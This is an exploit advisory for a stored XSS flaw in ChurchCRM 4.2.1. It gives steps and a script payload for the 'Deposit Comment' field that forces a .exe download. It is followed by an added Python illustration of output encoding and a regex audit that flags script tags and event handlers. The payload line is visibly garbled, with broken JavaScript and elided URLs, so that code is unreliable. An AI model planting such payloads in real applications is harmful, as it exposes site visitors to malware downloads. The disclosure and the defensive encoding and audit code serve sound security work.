#Exploit Title: ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)  
#Date: 2020-10-29  
#Exploit Author: Mufaddal Masalawala  
#Vendor Homepage:  
#Software Link:  
#Version: 4.2.1  
#Tested on: Kali Linux 2020.3  
#Proof Of Concept:  
The ChurchCRM application allows stored XSS via the 'Add New Deposit' module; the payload is rendered when the 'View All Deposits' page is visited. There are multiple locations where this can be replicated. To exploit this vulnerability:  
1. Login to the application, go to 'View all Deposits' module.  
2. Add the payload ( <script>var link = document.createElement('a');  
link.href = ''; = ''; document.body.appendChild(link);;  
) in the 'Deposit Comment' field and click "Add New Deposit".  
3. Payload is executed and a .exe file is downloaded.
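The root cause described above is a free-text field ('Deposit Comment') stored as-is and later written into the page without output encoding. The following is an added illustration, not ChurchCRM's own code, of the difference between the vulnerable rendering pattern and the fixed one, plus a simple audit routine a defender could run over already-stored comments to find entries that carry active content. The sample comment strings and the row layout are constructed for the example; the helper names are hypothetical.

```python
import html
import re

# Constructed sample of the kind of comment text the advisory describes:
# a <script> element that builds an anchor, attaches it to the page and
# triggers it. The URLs the advisory elides are left out here.
SAMPLE_PAYLOAD_COMMENT = (
    "<script>var link = document.createElement('a');"
    "document.body.appendChild(link);</script>"
)
SAMPLE_BENIGN_COMMENT = "Sunday offering, envelope #12 (cash)"

# Heuristic for active content in a value that should be plain text:
# script tags, inline event handlers (onclick=, onerror=, ...) and
# javascript: URLs. Intentionally broad; it is an audit aid, not a filter
# to rely on instead of output encoding.
ACTIVE_CONTENT = re.compile(
    r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)


def render_comment_vulnerable(comment: str) -> str:
    """Vulnerable pattern: the stored value is interpolated straight into
    HTML, so a comment containing markup becomes part of the page."""
    return f"<td>{comment}</td>"


def render_comment_fixed(comment: str) -> str:
    """Fixed pattern: HTML-encode the value at the point of output so it
    is displayed as text. quote=True also encodes ' and \", which matters
    when the same value is ever placed inside an attribute."""
    return f"<td>{html.escape(comment, quote=True)}</td>"


def contains_active_content(comment: str) -> bool:
    """True when a stored comment looks like it carries markup or script."""
    return ACTIVE_CONTENT.search(comment) is not None


def audit_deposit_comments(rows):
    """Scan (deposit_id, comment) pairs and return the ids whose comment
    looks like injected content, so they can be reviewed and cleaned
    after the output-encoding fix is deployed."""
    return [deposit_id for deposit_id, comment in rows
            if contains_active_content(comment)]


if __name__ == "__main__":
    # Constructed deposit rows for a stand-alone demonstration.
    rows = [
        (101, SAMPLE_BENIGN_COMMENT),
        (102, SAMPLE_PAYLOAD_COMMENT),
        (103, "Donation = 50; follow-up call done"),
    ]
    print("vulnerable:", render_comment_vulnerable(SAMPLE_PAYLOAD_COMMENT))
    print("fixed:     ", render_comment_fixed(SAMPLE_PAYLOAD_COMMENT))
    print("flagged:   ", audit_deposit_comments(rows))
```

ChurchCRM is a PHP application; the equivalent of `html.escape(..., quote=True)` there is `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` applied wherever the comment is echoed into a page. Encoding on output is the fix; the audit routine only helps find comments that were stored while the field was unprotected.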